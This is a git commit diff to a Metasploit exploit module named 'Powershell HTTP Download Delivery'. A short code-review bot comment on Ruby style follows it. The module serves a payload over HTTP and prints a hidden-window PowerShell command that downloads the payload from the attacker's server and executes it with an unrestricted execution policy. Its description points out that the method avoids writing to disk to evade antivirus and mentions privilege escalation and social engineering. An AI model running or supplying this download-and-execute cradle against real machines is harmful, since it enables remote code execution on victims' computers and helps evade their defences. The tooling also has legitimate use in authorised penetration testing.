Final updates and tidy

bug/bundler_fix
Meatballs 2013-07-24 17:28:19 +01:00
parent fe405d2187
commit 18ac83bec1
1 changed files with 16 additions and 17 deletions


@ -14,14 +14,19 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Powershell HTTP Downloader',
'Name' => 'Powershell HTTP Download Delivery',
'Description' => %q{
Quickly fires up a web server that serves the payload in powershell.
Two commands are given, the first will download and execute the payload
from within a powershell terminal. The second will start powershell and
then download and execute the payload. The main goal of this module is
so that a session can be quickly established on a target machine when
you have to manually type in the command yourself.
The command will start powershell and then download and execute the payload.
You can extract the IEX command to execute directly from powershell.
The main goal of this module is that a session can be quickly established
on a target machine when you have to manually type in the command yourself,
e.g. RDP Session, Local Access or maybe Remote Command Exec.
This does not write to disk so is unlikely to trigger AV solutions and will
allow you to attempt local privilege escalations supplied by meterpreter etc.
You could also try your luck with social engineering.
Ensure your payload architecture matches the target computer or use SYSWOW64
powershell.exe to execute x86 payloads on x64 machines.
},
'License' => MSF_LICENSE,
'Author' =>
@ -47,19 +52,13 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Delivering Payload")
data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return
end
def exploit
datastore['URIPATH'] ||= Rex::Text.rand_text_alpha(6)
url = (datastore['SSL'] ? "https://" : "http://")
url += (datastore['SRVHOST'] == '0.0.0.0') ? datastore['LHOST'] : datastore['SRVHOST']
url += ":" + datastore['SRVPORT'].to_s + "/" + datastore['URIPATH']
def primer
url = get_uri()
download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
print_good(download_and_run)
print_good("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")
print_line
super
print_status("Run the following command on the target machine:")
print_line("powershell.exe -windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted -command \"#{download_and_run}\"")
end
end
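Review bot: `url = get_uri()` in the new `primer` puts empty parentheses on a no-argument call; the file's Ruby style elsewhere drops them, so `url = get_uri` is the idiomatic form. `primer` also carries no comment saying when it runs — with the `exploit` override and its `super` removed, it presumably relies on the HttpServer mixin invoking it once the service is listening, and a one-line `# Hook run by the HttpServer mixin after the service is up; prints the command the operator must run.` would make that dependency visible to the next maintainer. The final `print_line` is well over 120 columns; assigning the fixed powershell.exe switches to a local such as `ps_flags` and interpolating it keeps the line readable without changing what is printed. The `on_request_uri` body at the top of this hunk begins outside it, so the fate of its trailing `return` cannot be confirmed from the rendered lines.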